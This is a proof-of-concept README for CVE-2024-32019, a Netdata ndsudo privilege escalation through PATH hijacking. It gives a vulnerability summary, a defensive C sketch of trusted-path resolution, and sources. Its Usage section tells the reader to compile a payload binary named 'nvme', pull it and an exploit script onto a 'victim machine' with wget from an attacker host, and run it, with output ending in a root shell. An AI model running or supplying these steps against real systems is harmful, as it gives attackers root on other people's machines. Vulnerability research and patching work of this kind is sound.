Description
Netdata ndsudo Privilege Escalation PoC
Introduction
# CVE-2024-32019 Netdata ndsudo Privilege Escalation PoC
## Summary
CVE-2024-32019 is a local privilege-escalation flaw in Netdata’s SUID helper ndsudo that lets a local user execute arbitrary programs as root via an untrusted search path (PATH hijacking).
The issue exists because ndsudo restricts command names but resolves them using the caller’s PATH, allowing a user to place a malicious binary earlier in PATH and have ndsudo run it with root privileges.
It affects Netdata Agent versions ≥ v1.45.0 and < v1.45.3, and ≥ v1.44.0-60 and < v1.45.0-169, and carries a CVSS v3.1 score of 8.8 (High).
Mitigation is to upgrade to v1.45.3 or v1.45.0-169; the weakness maps to CWE-426 (Untrusted Search Path).
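
The general remedy for CWE-426 in a privileged helper is to resolve an allowed command name against a fixed set of trusted directories and never consult the caller's `PATH`. The sketch below is an added example, not Netdata's code or its actual patch; `resolve_trusted`, `TRUSTED_DIRS` and the directory list are hypothetical names and values chosen for illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed trusted directories for this sketch (not Netdata's actual list). */
static const char *const TRUSTED_DIRS[] = { "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL };

/* Resolve a bare command name against `dirs` only; the caller's PATH is never
 * read. The file must be a regular file owned by `owner`, executable by the
 * owner, and not group/world writable. Returns 0 and fills `out`, else -1. */
int resolve_trusted(const char *name, const char *const *dirs, uid_t owner,
                    char *out, size_t outlen)
{
    struct stat st;
    if (!name || !*name || !out || outlen == 0 || strchr(name, '/'))
        return -1;                        /* bare names only, no paths */
    for (size_t i = 0; dirs[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", dirs[i], name);
        if (n < 0 || (size_t)n >= outlen)
            continue;                     /* candidate path truncated */
        if (stat(out, &st) != 0 || !S_ISREG(st.st_mode))
            continue;                     /* missing or not a regular file */
        if (st.st_uid != owner || (st.st_mode & (S_IWGRP | S_IWOTH)))
            continue;                     /* replaceable by another account */
        if (st.st_mode & S_IXUSR)
            return 0;                     /* `out` is built from a trusted dir */
    }
    out[0] = '\0';
    return -1;
}

int main(void)
{
    char path[PATH_MAX];
    /* Constructed scenario: a user-controlled directory is first in PATH. */
    setenv("PATH", "/tmp:/usr/bin:/bin", 1);
    if (resolve_trusted("nvme", TRUSTED_DIRS, 0, path, sizeof path) == 0)
        printf("would execv: %s\n", path);   /* execv() does not search PATH */
    else
        printf("nvme not found in trusted directories; refusing to run\n");
    return 0;
}
```

The resolved path is meant to be passed to `execv()`, which takes a path and performs no `PATH` lookup, unlike `execvp()`.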
## Usage
1. Compile the payload, or craft your own
```
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
```
2. Upload the script and payload to the victim machine
```
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01-- http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’
CVE-2024-32019.sh 100%[==================================================>] 712 --.-KB/s in 0s
2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10-- http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’
nvme 100%[==================================================>] 813.04K 1.98MB/s in 0.4s
2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
```
3. Execute the PoC
```
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#
```
#### Sources:
- https://www.rapid7.com/db/modules/exploit/linux/local/ndsudo_cve_2024_32019/
- https://www.wiz.io/vulnerability-database/cve/cve-2024-32019
- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
File snapshot
[4.0K] /data/pocs/8ea0892dbbeb787439a79500b3263018289650dd
├── [ 712] CVE-2024-32019.sh
├── [ 157] payload.c
└── [2.3K] README.md
0 directories, 3 files